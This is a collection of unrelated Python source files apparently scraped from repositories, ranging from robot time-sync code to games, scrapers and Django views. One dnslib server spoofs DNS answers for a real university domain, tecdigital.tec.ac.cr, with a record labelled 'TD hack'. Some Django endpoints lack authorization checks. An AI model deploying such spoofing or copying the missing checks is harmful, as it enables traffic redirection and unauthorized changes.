self.endpoint.has_established_time_sync\n\n @property\n def stopped(self):\n \"\"\"Returns True if thread is no longer running.\"\"\"\n with self._lock:\n return not self._thread or not self._thread.is_alive()\n\n @property\n def thread_exception(self):\n \"\"\"Return any exception which ended the time-sync thread.\"\"\"\n with self._lock:\n return self._locked_thread_exception\n\n @property\n def endpoint(self):\n \"\"\"Return the TimeSyncEndpoint used by this thread.\"\"\"\n return self._time_sync_endpoint\n\n def get_robot_clock_skew(self, timesync_timeout_sec=0):\n \"\"\"Get current estimate for robot clock skew from local time.\n\n Args:\n timesync_timeout_sec (float): Time to wait for timesync before doing conversion.\n\n Returns:\n Clock skew as a google.protobuf.Duration object\n\n Raises:\n InactiveThreadError: Time-sync thread exits before time-sync.\n time_sync.TimedOutError: Deadline to achieve time-sync is exceeded.\n Threading Exceptions: Errors from threading the processes.\n \"\"\"\n self.wait_for_sync(timeout_sec=timesync_timeout_sec)\n return self.endpoint.clock_skew\n\n def get_robot_time_converter(self, timesync_timeout_sec=0):\n \"\"\"Get a RobotTimeConverter for current estimate for robot clock skew from local time.\n\n Args:\n timesync_timeout_sec (float): Time to wait for timesync before doing conversion.\n\n Raises:\n InactiveThreadError: Time-sync thread exits before time-sync.\n time_sync.TimedOutError: Deadline to achieve time-sync is exceeded.\n Threading Exceptions: Errors from threading the processes.\n \"\"\"\n self.wait_for_sync(timeout_sec=timesync_timeout_sec)\n return self.endpoint.get_robot_time_converter()\n\n def robot_timestamp_from_local_secs(self, local_time_secs, timesync_timeout_sec=0):\n \"\"\"Convert a local time in seconds to a timestamp proto in robot time.\n\n Args:\n local_time_secs (float): Timestamp in seconds since the unix epoch (e.g.,\n from time.time()).\n timesync_timeout_sec (float): Time to wait for timesync before doing conversion.\n\n Returns:\n google.protobuf.Timestamp representing local_time_secs in robot clock, or None if\n local_time_secs is None.\n\n Raises:\n InactiveThreadError: Time-sync thread exits before time-sync.\n time_sync.TimedOutError: Deadline to achieve time-sync is exceeded.\n Threading Exceptions: Errors from threading the processes.\n \"\"\"\n if not local_time_secs:\n return None\n converter = self.get_robot_time_converter(timesync_timeout_sec)\n return converter.robot_timestamp_from_local_secs(local_time_secs)\n\n def _timesync_thread(self):\n \"\"\"Background thread which communicates with the time-sync service on robot.\n\n The purpose of this thread is to achieve and maintain time-sync, which is an estimate\n of the difference between the robot's and client's system clocks.\n \"\"\"\n try:\n while not self.should_exit:\n response = self._time_sync_endpoint.response\n # pylint: disable=no-member\n if (not response or response.state.status\n == time_sync_pb2.TimeSyncState.STATUS_MORE_SAMPLES_NEEDED):\n # No wait between updates while time-sync is not established.\n pass\n elif response.state.status == time_sync_pb2.TimeSyncState.STATUS_SERVICE_NOT_READY:\n # Wait a few seconds between updates while waiting for time-sync service\n # to be ready.\n self._event.wait(self.TIME_SYNC_SERVICE_NOT_READY_INTERVAL_SEC)\n else:\n # When sync has been established, use default wait time.\n self._event.wait(self.time_sync_interval_sec)\n\n # Do RPC call to update time-sync information.\n if not self.should_exit:\n 
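# get_new_estimate() sends the RPC and stores the new round-trip sample and skew estimate\n                    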
self._time_sync_endpoint.get_new_estimate()\n\n # For now, on GRPC error, store the error object and exit the thread.\n except Error as err:\n with self._lock:\n self._locked_thread_exception = err\n","repo_name":"boston-dynamics/spot-sdk","sub_path":"python/bosdyn-client/src/bosdyn/client/time_sync.py","file_name":"time_sync.py","file_ext":"py","file_size_in_byte":20605,"program_lang":"python","lang":"en","doc_type":"code","stars":2148,"dataset":"github-code","pt":"61"} +{"seq_id":"5416808924","text":"# sentence = \"What is the Airspeed Velocity of an Unladen Swallow?\"\n# result = {word: len(word) for word in sentence.split()}\n# print(result)\n\n\n# You are going to use Dictionary Comprehension to create a dictionary called weather_f\n# that takes each temperature in degrees Celsius and converts it into degrees Fahrenheit.\nweather_c = {\n \"Monday\": 12,\n \"Tuesday\": 14,\n \"Wednesday\": 15,\n \"Thursday\": 14,\n \"Friday\": 21,\n \"Saturday\": 22,\n \"Sunday\": 24,\n}\n\nweather_f = {day : temp*9/5+32 for (day, temp) in weather_c.items()}\n# print(weather_f)\nprint(weather_c.items())","repo_name":"Toffiona/100_days_of_code","sub_path":"Day_26/exercise_dict_comprehensive.py","file_name":"exercise_dict_comprehensive.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33336636221","text":"\"\"\"\nspider tags \nurl = \"https://stackoverflow.com/tags?page=\" + ### + \"&tab=popular\"\n\"\"\"\nimport requests\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm\nimport sys\nimport argparse\n\ndef tags_spider(start_index, end_index):\n \"\"\"\n spider tags from pages[start_index, end_index]\n \"\"\"\n print(\"-----------spider tag process----------\")\n cnt = 0\n\n with open(\"../txts/tags.txt\", \"w\") as wf:\n \n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'}\n for num in tqdm(range(start_index, end_index+1)):\n\n url = \"https://stackoverflow.com/tags?page=\" + str(num) + \"&tab=popular\"\n req = requests.get(url, headers=headers)\n soup = BeautifulSoup(req.text, \"lxml\")\n\n try:\n items = soup.find_all(\"a\", attrs={\"class\":\"post-tag\"})\n cnt += len(items)\n for item in items:\n # print(tag)\n tag = item.get_text()\n wf.write(tag+\"\\n\")\n except:\n continue\n \n print(\"spider\",cnt,\"tags.\")\n\n\n# start_index = int(sys.argv[1])\n# end_index = int(sys.argv[2])\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-s\", \"--start\", type=int, default=1, help=\"start index of page\")\n parser.add_argument(\"-e\", \"--end\", type=int, default=5, help=\"end index of page\")\n args = parser.parse_args()\n tags_spider(args.start, args.end)","repo_name":"Rvlis/Implementation-of-HDSKG-using-BERT","sub_path":"HDSKG-Chunking/tags_spider.py","file_name":"tags_spider.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"42115499696","text":"import pygame\n\nfrom classes.ysortcameragruop import YSortCameraGroup\nfrom utils import config, import_folder\nfrom classes.tile import Tile\nfrom classes.player import Player\nfrom classes.enemy import Enemy\nfrom classes.ui import UI\nfrom classes.weapon import Weapon\nfrom particles import ParticlesData\n\n\nclass Level:\n def __init__(self):\n self.screen = pygame.display.get_surface()\n self.visible_sprites = 
YSortCameraGroup()\n self.collided_sprites = pygame.sprite.Group()\n self.attack_sprites = pygame.sprite.Group()\n self.attackable_sprites = pygame.sprite.Group()\n\n self.game_over = False\n self.font = pygame.font.Font(config.UI_FONT, 48)\n self.game_over_text = self.font.render('Game Over', True, config.RED)\n self.text_rect = self.game_over_text.get_rect()\n self.text_rect.center = (config.WIDTH // 2, config.HEIGHT // 2)\n\n self.current_attack = None\n self.ui = UI()\n self.particle_animation = ParticlesData()\n self.create_map()\n\n def create_map(self):\n layouts = {\n 'boundary': import_folder.import_csv('sprites/map/map_FloorBlocks.csv'),\n 'entities': import_folder.import_csv('sprites/map/map_Entities.csv')\n }\n for style, layout in layouts.items():\n for i, row in enumerate(layout):\n for j, column in enumerate(row):\n if column != '-1':\n pos_x = j * config.TILE_SIZE\n pos_y = i * config.TILE_SIZE\n\n if style == 'boundary':\n Tile((pos_x, pos_y), [self.collided_sprites], 'invisible')\n if style == 'entities':\n if column == '394':\n self.player = Player((pos_x, pos_y), [self.visible_sprites],\n self.collided_sprites, self.create_attack, self.destroy_attack)\n else:\n if column == '392':\n monster_name = 'raccoon'\n else:\n monster_name = 'squid'\n Enemy(monster_name, (pos_x, pos_y), [self.visible_sprites, self.attackable_sprites],\n self.collided_sprites, self.attacking_player)\n\n def create_attack(self):\n self.current_attack = Weapon(self.player, [self.visible_sprites, self.attack_sprites])\n\n def destroy_attack(self):\n if self.current_attack:\n self.current_attack.kill()\n self.current_attack = None\n\n def player_attack_logic(self):\n if self.attack_sprites:\n for attack_sprite in self.attack_sprites:\n collision_sprite = pygame.sprite.spritecollide(attack_sprite, self.attackable_sprites, False)\n if collision_sprite:\n for target_sprite in collision_sprite:\n target_sprite.get_damage(self.player)\n\n def attacking_player(self, amount, attack_type):\n if self.player.vulnerable:\n if self.player.health <= 0:\n self.game_over = True\n self.game_end()\n else:\n self.player.health -= amount\n if self.player.health <= 0:\n self.game_over = True\n self.game_end()\n self.player.vulnerable = False\n self.player.hurt_time = pygame.time.get_ticks()\n self.particle_animation.create_particles(attack_type, self.player.rect.center, [self.visible_sprites])\n\n def update(self):\n self.visible_sprites.custom_draw(self.player)\n self.visible_sprites.update()\n self.visible_sprites.enemy_update(self.player)\n self.player_attack_logic()\n self.ui.display(self.player)\n self.game_end()\n\n def game_end(self):\n if self.game_over:\n self.player.kill()\n self.screen.fill(config.BLACK)\n self.screen.blit(self.game_over_text, self.text_rect)","repo_name":"LirioNOne/RPG_with_pygame","sub_path":"classes/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1557382471","text":"from PIL import Image\r\nimport os\r\nfrom numpy import genfromtxt\r\nimport gzip, pickle\r\nfrom glob import glob\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom tools import logger\r\nimport theano\r\nfrom context import resource_manager\r\nfrom tools import file_manage\r\n\r\nlog = logger.getLogger()\r\n\r\n\r\nclass pcolors:\r\n HEADER = '\\033[95m'\r\n OKBLUE = '\\033[94m'\r\n OKGREEN = '\\033[92m'\r\n WARNING = '\\033[93m'\r\n FAIL = '\\033[91m'\r\n ENDC = '\\033[0m'\r\n BOLD = 
'\\033[1m'\r\n    UNDERLINE = '\\033[4m'\r\n    Blue = '\\033[95m'\r\n\r\n    def disable(self):\r\n        self.HEADER = ''\r\n        self.OKBLUE = ''\r\n        self.OKGREEN = ''\r\n        self.WARNING = ''\r\n        self.FAIL = ''\r\n        self.ENDC = ''\r\n\r\n\r\ndef dir_to_dataset(glob_files):\r\n    dataset = []\r\n    clazz = []\r\n    for file_count, file_name in enumerate(sorted(glob(glob_files), key=len)):\r\n        log.info(file_name + \"Working process:\\n\\t %s\" % glob_files)\r\n        img = Image.open(file_name).convert('LA')  # to grayscale\r\n        pixels = [f[0] for f in list(img.getdata())]\r\n        dataset.append(pixels)\r\n        classLabel = file_name.split(\"_\")[1]\r\n        print(file_name, \"<--->\", classLabel)\r\n        clazz.append(classLabel)\r\n        if file_count % 1000 == 0:\r\n            print(\"\\t %s files processed\" % file_count)\r\n    # outfile = glob_files+\"out\"\r\n    # np.save(outfile, dataset)\r\n\r\n    return np.array(dataset), np.array(clazz)\r\n\r\n\r\ndef build_proxy(path):\r\n    s = path.split(resource_manager.getSeparator())\r\n    s = s[(len(s) - 1)]\r\n    c = 0\r\n    if s[0:4] == \"data\":\r\n        log.info(\" do binarization about files in \" + str(path))\r\n        size = s[4:]\r\n        size = int(size)\r\n        for i in os.walk(path, False):\r\n            for f in i[2]:\r\n                c = c + 1\r\n        return c\r\n    return 0\r\n\r\n\r\ndef initDataSet(src=resource_manager.Properties.getDefaultWorkFold()):\r\n    log.info(\"starting to build image cnn pkz file.\")\r\n    # print \"start binaryzationJpg()\"\r\n    files = file_manage.subdirs(src)\r\n    # files=file_manage.subfilesName(path);\r\n    # print \"###########\",src,\"##\",length,\"###########\"\r\n    sizeSet=set()\r\n    for f in files:\r\n        path = os.path.join(src, f)\r\n        if os.path.isdir(path):\r\n            # shutil.copy(os.path.join(path,f),os.path.join(path,f))\r\n\r\n            s = path.split(resource_manager.getSeparator())\r\n            s = s[(len(s) - 1)]\r\n            c = 0\r\n            size = 0\r\n            if s[0:4] == \"data\":\r\n                log.info(\" do binarization about files in \" + str(path))\r\n                size = s[4:]\r\n                size = str(size)\r\n                sizeSet.add(size)\r\n            else:\r\n                continue\r\n    for size in sizeSet:\r\n        path = resource_manager.Properties.getDefaultWorkFold()+\"train/data\" + size + \"/*\";\r\n        Data, y = dir_to_dataset(path)\r\n        # Data and labels are read\r\n\r\n        train_set_x = np.asarray(Data, dtype=theano.config.floatX);\r\n        train_set_y = y;\r\n\r\n        path = resource_manager.Properties.getDefaultWorkFold()+\"verify/data\" + size + \"/*\";\r\n        Data, y = dir_to_dataset(path)\r\n\r\n        val_set_x = np.asarray(Data, dtype=theano.config.floatX);\r\n        val_set_y = y\r\n\r\n        path = resource_manager.Properties.getDefaultWorkFold()+\"test/data\" + size + \"/*\";\r\n        Data, y = dir_to_dataset(path)\r\n\r\n        test_set_x = np.asarray(Data, dtype=theano.config.floatX);\r\n        test_set_y = y\r\n\r\n        train_set = train_set_x, train_set_y\r\n        val_set = val_set_x, val_set_y\r\n        test_set = test_set_x, test_set_y\r\n        dataset = [train_set, val_set, test_set]\r\n        log.info(\"starting to build pkl file ......\")\r\n        name = resource_manager.Properties.getDefaultDataFold()+'pickle/file-' + size + '.pkl.gz';\r\n        f = gzip.open(name, 'wb')\r\n        pickle.dump(dataset, f, protocol=2)\r\n        f.close()\r\n        log.info(\"the file of file-\"+size+\".pkl.gz file has been created at \" + resource_manager.Properties.getDefaultDataFold() + \"pickle\" + \"....\")\r\n\r\n\r\n# this is to test the data\r\ndef testData(index):\r\n    f = gzip.open('file-28.pkl.gz', 'rb')\r\n    train_set, valid_set, test_set = pickle.load(f)\r\n    train_set_x = train_set[0];\r\n    train_set_y = train_set[1];\r\n    sample = np.asarray(train_set_x, dtype=theano.config.floatX)\r\n    print(len(sample[0]))\r\n    a = sample[index]\r\n    for i in range(0, len(a)):\r\n        if a[i] > 128:\r\n            print(pcolors.FAIL + \"*\", end=\" \")\r\n        else:\r\n            print(pcolors.HEADER + \"0\", end=\" \")\r\n        if ((i + 1) % 28 == 0):\r\n            print(\"\")\r\n    print(\"label is:%s\" % train_set_y[index])\r\n\r\nif __name__==\"__main__\":\r\n    initDataSet(src=resource_manager.Properties.getDefaultWorkFold())\r\n","repo_name":"gwdgithubnom/ox-patient","sub_path":"src/main/python/tools/dataset_build.py","file_name":"dataset_build.py","file_ext":"py","file_size_in_byte":4798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"17613817683","text":"__doc__=\"\"\"HardwareClass\n\nHardwareClass represents a software vendor's product.\n\n$Id: HardwareClass.py,v 1.5 2003/03/08 18:34:24 edahl Exp $\"\"\"\n\n__version__ = \"$Revision: 1.5 $\"[11:-2]\n\nfrom App.special_dtml import DTMLFile\nfrom AccessControl.class_init import InitializeClass\n\nfrom Products.ZenRelations.RelSchema import *\n\nfrom ProductClass import ProductClass\n\ndef manage_addHardwareClass(context, id, title = None, REQUEST = None):\n    \"\"\"make a HardwareClass\"\"\"\n    d = HardwareClass(id, title)\n    context._setObject(id, d)\n\n    if REQUEST is not None:\n        REQUEST['RESPONSE'].redirect(context.absolute_url_path()\n                                     +'/manage_main') \n\naddHardwareClass = DTMLFile('dtml/addHardwareClass',globals())\n\nclass HardwareClass(ProductClass):\n    \"\"\"HardwareClass object\"\"\"\n    portal_type = meta_type = 'HardwareClass'\n\nInitializeClass(HardwareClass)\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/HardwareClass.py","file_name":"HardwareClass.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"}
{"seq_id":"23888535897","text":"import numpy as np\nfrom keras.models import model_from_json\n\narquivo = open('classificador_breast.json','r')\nestrutura_rede = arquivo.read()\narquivo.close()\n\n# import the network structure\nclassificador = model_from_json(estrutura_rede)\n# import the network weights\nclassificador.load_weights('classificador_braest.h5')\n\n# create a new record for testing\nnovoRegisto=np.array([[15.80,8.34,118,900,0.10,0.26,0.08,0.134,0.178,0.20,0.05,1098,0.87,\n                       4500,145.2,0.005,0.04,0.05,0.015,0.03,0.007,23.15,16.64,178.5,2018,0.14,\n                       0.185,0.84,158,0.363]])\n# use the network to make a new prediction\nprevisao = classificador.predict(novoRegisto)","repo_name":"Allanfd12/Curso-Deep-Learning","sub_path":"breast_cancer/breast_cancer_salvar_carregar/breast_cancer_carregar.py","file_name":"breast_cancer_carregar.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
{"seq_id":"17617252749","text":"#!/usr/bin/env python3\nimport logging\nimport os\nimport signal\nfrom pathlib import Path\nfrom time import sleep\n\nfrom dnslib import DNSLabel, QTYPE, RR, dns\nfrom dnslib.proxy import ProxyResolver\nfrom dnslib.server import DNSServer\n\n# Initialize the logger\nhandler = logging.StreamHandler()\nhandler.setLevel(logging.INFO)\nlogger = logging.getLogger(__name__)\nlogger.addHandler(handler)\nlogger.setLevel(logging.INFO)\n\n# Map record-type strings to dnslib types\nDNS_TYPES = {\n    'A': (dns.A, QTYPE.A),\n    'AAAA': (dns.AAAA, QTYPE.AAAA),\n    'MX': (dns.MX, QTYPE.MX),\n    'TXT': (dns.TXT, QTYPE.TXT)\n}\n\n# Class that holds a DNS record, compatible with dnslib\n\n\nclass Record:\n    def __init__(self, rname, rtype, args):\n        self._rname = DNSLabel(rname)\n\n        rd_cls, self._rtype = DNS_TYPES[rtype]\n\n        self.rr = RR(\n            rname=self._rname,\n            rtype=self._rtype,\n            rdata=rd_cls(*args),\n            ttl=5,\n        )\n\n    def match(self, q):\n        return q.qname == self._rname and (q.qtype == QTYPE.ANY or q.qtype == self._rtype)\n\n    def __str__(self):\n        return str(self.rr)\n\n\n# DNS records\nRECORDS = [\n    Record('example.com', 'A', ('1.2.3.4',)),\n    Record('test.com', 'A', ('4.3.3.4',)),\n    Record('test.com', 'MX', ('Hola Mundo Test',)),\n\n    Record('redesce.com', 'TXT', ('Hola Mundo Redes',)),\n    Record('redesce.com', 'A', ('99.88.77.66',)),\n    Record('redesce.com', 'AAAA', ('2001:0db8:85a3:0000:0000:8a2e:0370:7334',)),\n\n    Record('tecdigital.tec.ac.cr', 'TXT', ('Record del TD hack',)),\n    Record('tecdigital.tec.ac.cr', 'A', ('35.232.39.227',)),\n    Record('tecdigital.tec.ac.cr', 'AAAA', ('2001:0db8:85a3:0000:0000:0000:0000:0000',)),\n]\n\n# Class that resolves DNS queries, compatible with dnslib\n\n\nclass Resolver(ProxyResolver):\n    def __init__(self, upstream):\n        super().__init__(upstream, 53, 5)\n        self.records = RECORDS\n\n    def resolve(self, request, handler):\n        type_name = QTYPE[request.q.qtype]\n        reply = request.reply()\n        for record in self.records:\n            if record.match(request.q):\n                reply.add_answer(record.rr)\n\n        if reply.rr:\n            logger.info(\n                'found record for %s[%s], %d entries', request.q.qname, type_name, len(reply.rr))\n            return reply\n\n        logger.info(\n            'not found locally, querying public DNS for %s[%s]', request.q.qname, type_name)\n        return super().resolve(request, handler)\n\n\n# Handle the termination signal to end the program\ndef handle_sig(signum, frame):\n    logger.info('pid=%d, got signal %s, exiting...',\n                os.getpid(), signal.Signals(signum).name)\n    exit(0)\n\n\n# Main\nif __name__ == '__main__':\n    signal.signal(signal.SIGTERM, handle_sig)\n\n    # dnslib configuration\n    port = int(os.getenv('PORT', 53))\n    # This server will be used as the upstream public DNS\n    upstream = os.getenv('UPSTREAM', '8.8.8.8')\n    resolver = Resolver(upstream)\n    udp_server = DNSServer(resolver, port=port)\n    tcp_server = DNSServer(resolver, port=port, tcp=True)\n\n    logger.info(\n        'starting DNS server on port %d, with upstream server \"%s\"', port, upstream)\n    udp_server.start_thread()\n    tcp_server.start_thread()\n\n    try:\n        while udp_server.isAlive():\n            sleep(1)\n    except KeyboardInterrupt:\n        pass\n","repo_name":"gsegura96/desafio_redes","sub_path":"dnserver.py","file_name":"dnserver.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"72208769794","text":"from orator.migrations import Migration\n\n\nclass CreateDetalleFacturaTable(Migration):\n\n    def up(self):\n        \"\"\"\n        Run the migrations.\n        \"\"\"\n        with self.schema.create('detalle_factura') as table:\n            table.increments('id')\n            table.integer('factura_id', unsigned=True)\n            table.integer('cantidad')\n            table.decimal('sub_total',5,2)\n            table.decimal('IGV',5,2)\n            table.decimal('monto_total',5,2)\n            table.timestamps()\n            \n            table.foreign('factura_id').references('id').on('factura')\n\n    def down(self):\n        \"\"\"\n        Revert the migrations.\n        \"\"\"\n        
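# reverse of up(): drop the detalle_factura table\n        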
self.schema.drop('detalle_factura')\n","repo_name":"BraulioBerlanga/WhatsApp-chatbot","sub_path":"migrations/2020_08_08_212108_create_Detalle_factura_table.py","file_name":"2020_08_08_212108_create_Detalle_factura_table.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33488153287","text":"# !/usr/bin/python\n# coding:utf-8\n## 上面两条注释可以解决 中文注释报错的问题 SyntaxError: Non-ASCII character\n\n\n\nimport pygame\n\nfrom settings import Settings\n\nfrom ship import Ship\n\nimport game_functions as gf\n\n# 一个函数\ndef run_game():\n # 初始化游戏并创建一个屏幕对象\n pygame.init()\n ai_settings = Settings()\n screen = pygame.display.set_mode((ai_settings.screen_width,ai_settings.screen_height))\n pygame.display.set_caption(\"Alien \")\n\n bg_color = (230, 230, 230)\n\n # 创建一艘飞船\n\n ship = Ship(screen)\n # 开始游戏的主循环\n while True:\n\n # 监视键盘和鼠标事件\n # for event in pygame.event.get():\n # if event.type == pygame.QUIT:\n # sys.exit()\n gf.check_event(ship)\n ship.update()\n # # 每次循环时都重绘屏幕\n # screen.fill(bg_color)\n #\n # ship.blitme()\n #\n # # 让最近绘制的屏幕可见\n # pygame.display.flip()\n gf.update_screen(ai_settings,screen,ship)\n\n# run_game()必须前面没有缩进,否则 pygame.display.flip()后面会报错,看来python虽然没有{},但是是靠 缩进来比对代码块。\nrun_game()\n","repo_name":"Seachal/LearnPy1","sub_path":"alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26886750589","text":"# coding=utf-8\n\"\"\"\nNB: If you get the SSL error on mac, you may need to run:\n\n/Applications/Python 3.6/Install Certificates.command\n\nLots of docs:\nhttps://warehouse.readthedocs.io/api-reference/xml-rpc/\n\n\n# Journal of all things that have happened since point in time.\n#\n# import xmlrpc.client\n# >>> import arrow\n# >>> client = xmlrpc.client.ServerProxy('https://test.pypi.org/pypi')\n# >>> latefeb = arrow.get('2018-02-20 10:00:00')\n# >>> latefeb.timestamp\n# 1519120800\n# >>> latefebstamp = latefeb.timestamp\n# >>> recentchanges = client.changelog(latefebstamp)\n# >>> len(recentchanges)\n# 7322\n# >>> for entry in recentchanges:\n# ... if entry[0] == 'twine':\n# ... 
print(entry[1], \" \", entry[3], \" \", entry[2])\n#\n# \"\"\"\nimport pypi_xmlrpc\n\n\ndef list_packages() -> None:\n \"\"\"\n List all packages using xmlrpc\n :return:\n \"\"\"\n try:\n import xmlrpclib\n except ImportError:\n import xmlrpc.client as xmlrpclib\n\n client = xmlrpclib.ServerProxy(\"https://pypi.python.org/pypi\")\n # get a list of package names\n packages = client.list_packages()\n\n\nif __name__ == \"__main__\":\n\n def run() -> None:\n \"\"\"\n Exercise code\n :return:\n \"\"\"\n name = \"jiggle_version\"\n user = \"matthewdeanmartin\"\n version = \"1.0.68\"\n # x = pypi_xmlrpc.list_packages()\t# return list of all server packages\n # print(x)\n x = pypi_xmlrpc.package_releases(\n name, show_hidden=True\n ) # return list of package releases\n print(x)\n x = pypi_xmlrpc.package_roles(name) # return list of package roles\n print(x)\n x = pypi_xmlrpc.release_data(\n name, version\n ) # return dictionary with release data\n print(x)\n x = pypi_xmlrpc.release_urls(name, version) # return list of release urls\n print(x)\n x = pypi_xmlrpc.user_packages(user) # return list of user packages\n print(x)\n #\n\n run()\n","repo_name":"matthewdeanmartin/pypi_librarian","sub_path":"pypi_librarian/xml_rpc_endpoints.py","file_name":"xml_rpc_endpoints.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"23436446421","text":"def maximize(ln,lk):\n ken=0\n naomi=0\n for i in range(1,N+1):\n if lk[0]>ln[-1]:\n del(ln[0])\n del(lk[-1])\n ken+=1\n else:\n for j in range(0,N-i+2):\n if ln[j]>lk[0]:break\n del(ln[j])\n del(lk[0])\n naomi+=1\n return naomi\ndef war(ln,lk):\n ken=0\n naomi=0\n for i in range(1,N+1):\n if ln[-1]>lk[-1]:\n del(lk[0])\n naomi+=1\n else:\n for j in range(0,N-i+2):\n if lk[j]>ln[-1]:break\n del(lk[j])\n ken+=1\n del(ln[-1])\n return naomi\nT=int(input())\nfor i in range(1,T+1):\n N=int(input())\n tmp=input().split()\n map(int,tmp)\n ln=tmp\n tmp=input().split()\n map(int,tmp)\n lk=tmp\n ln.sort()\n lk.sort()\n (ln1,ln2,lk1,lk2)=(ln[:],ln[:],lk[:],lk[:])\n a=maximize(ln1,lk1)\n b=war(ln2,lk2)\n print(\"Case #\",i,\": \",a,\" \",b,sep=\"\")\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_138/902.py","file_name":"902.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27786905283","text":"\"\"\"\nlambda test program\n\"\"\"\nimport common_module\n\nclass LambdaTester:\n \"\"\"\n \"\"\"\n\n def lambda_test(self):\n \"\"\"\n \"\"\"\n common_module.print_function(self.lambda_test)\n\n add = lambda x,y: x+y\n result = add(5,3)\n print(result)\n\n numbers = [1,2,3,4,5]\n\n result = map(lambda x: x**2, numbers)\n print(list(result))\n\n # Convert list of strings to list of integers\n string_list = ['1','2','10','20']\n result = map(lambda x: int(x), string_list)\n list_result = list(result)\n print(list_result)\n\n # Alternative without using lambda:\n result2 = list(map(int, string_list))\n print(result2)\n\n # use list comprehension:\n new_list = [int(i) for i in string_list]\n print('new_list=', new_list)\n\n new_list2 = [i**2 for i in numbers]\n print('new_list2=', new_list2)\n\ndef main() -> None:\n\n me = LambdaTester()\n\n me.lambda_test()\n\n\nif __name__ == '__main__':\n 
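# exercise the lambda examples when run as a script\n    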
main()","repo_name":"henryhjia/pythonproject","sub_path":"lamdba.py","file_name":"lamdba.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33602639553","text":"from rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom .models import SubTeam\nfrom .serializers import SubTeamSerialiser\nfrom ..users.models import User\nfrom ..users.serializers import PublicUserSerializer\n\nfrom django.db.models import Q\nimport json\n\n\n@api_view(['POST'])\ndef create_subteam(request):\n if (request.user.is_authenticated is False):\n return Response(\"User not authenticated\", status=401)\n else:\n if (request.user.team_admin is False):\n return Response(\"User is not authorised to create a subteam\", status=403)\n else:\n serialiser = SubTeamSerialiser(data=request.data)\n if serialiser.is_valid():\n serialiser.save()\n return Response(serialiser.data, status=200)\n else:\n return Response(serialiser.errors, status=400)\n\n\n@api_view(['GET'])\ndef get_subteams(request, team_id):\n # todo add in auth checks for this endpoint\n subteams = SubTeam.objects.filter(team_id=team_id)\n serializer = SubTeamSerialiser(subteams, many=True)\n return Response(serializer.data, status=200)\n\n\n@api_view(['PUT'])\ndef update_subteam(request, subteam_id):\n if (request.user.is_authenticated is False):\n return Response(\"User not authenticated\", status=401)\n else:\n # if (request.user.team_admin is False):\n # return Response(\"User is not authorised to update a subteam\", status=403)\n # else:\n subteam = SubTeam.objects.get(subteam_id=subteam_id)\n serializer = SubTeamSerialiser(instance=subteam, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n else:\n return Response(serializer.errors, status=400)\n\n\n@api_view(['DELETE'])\ndef delete_subteam(request, subteam_id):\n if (request.user.is_authenticated is False):\n return Response(\"User not authenticated\", status=401)\n else:\n users = User.objects.filter(subteam_id=subteam_id)\n subteam = SubTeam.objects.get(subteam_id=subteam_id)\n for user in users:\n user.subteam_id = None\n user.save()\n subteam.delete()\n return Response(\"subteam deleted\", status=200)\n\n\n@api_view(['GET'])\ndef get_subteam_users(request, subteam_id):\n if request.user.is_authenticated is False:\n return Response(\"User not authenticated\", status=403)\n else:\n users = User.objects.filter(Q(subteam_id=subteam_id) & Q(team_id=request.user.team_id))\n serialiser = PublicUserSerializer(users, many=True)\n return Response(serialiser.data, status=200)\n\n\n@api_view(['GET'])\ndef get_available_users(request):\n if request.user.is_authenticated is False:\n return Response(\"User not authenticated\", status=403)\n else:\n users = User.objects.filter(Q(subteam_id=None) & Q(team_id=request.user.team_id))\n serialiser = PublicUserSerializer(users, many=True)\n return Response(serialiser.data, status=200)\n\n\n@api_view(['PUT'])\ndef edit_user_to_subteam(request, user_id):\n data = json.loads(request.body)\n subteam_id = data['subteam_id']\n subteam = SubTeam.objects.get(subteam_id=subteam_id)\n user = User.objects.get(id=user_id)\n user.subteam_id = subteam\n user.save()\n return Response(\"User added to subteam\", status=200)\n\n\n@api_view(['PUT'])\ndef delete_user_from_subteam(request, user_id):\n user = User.objects.get(id=user_id)\n user.subteam_id = None\n user.save()\n return 
